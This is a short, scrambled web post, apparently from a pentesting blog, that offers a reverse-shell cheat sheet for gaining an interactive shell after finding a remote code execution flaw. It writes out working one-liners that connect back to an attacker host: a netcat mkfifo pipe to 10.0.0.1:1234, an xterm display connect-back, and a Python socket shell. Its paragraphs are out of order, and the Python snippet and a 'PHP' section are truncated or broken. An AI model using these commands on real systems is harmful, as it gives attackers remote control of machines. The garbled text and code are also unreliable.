I need help!ĭo you think it’s hard to memorize all reverse shells? It’s true! It will try to connect back to you, attackerip, on TCP port 6001. Then on the target (assuming that xterm is installed!) connect back to the open X Server on your system: xterm -display attackerip:1 Then remember to authorise on your system the target IP to connect to you: xterm -display 127.0.0.1:1 More information about reverse shells with netcat on this article: Reverse shell with Netcat: some use cases If you have the wrong version of netcat installed, you might still be able to get your reverse shell back like this: rm /tmp/f mkfifo /tmp/f cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f Netcat is rarely present on production systems and even if it is there are several version of netcat, some of which don’t support the -e option. This code assumes that the TCP connection uses file descriptor 3. Tested under Linux / Python 2.7: python -c 'import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("10.0.0.1",1234)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call() ' PHP
So, below a simple cheatsheet of commands for the major languages/OS focused on the creation of a reverse shell: Python Target machine acts as a client and initiates a connection to the attacker’s listening server. If attacker’s machine is reachable, it could open a communication channel on a port and waits for incoming connections. The reverse shell is an attack technique used when the target machine is NATed and hence not directly reachable.
One of the most used method is the creation of a reverse shell, useful to get through firewalls. During a penetration test, you could lucky enough to find a RCE vulnerability: in this case, the next step should be to obtain an interactive shell.
0 kommentar(er)
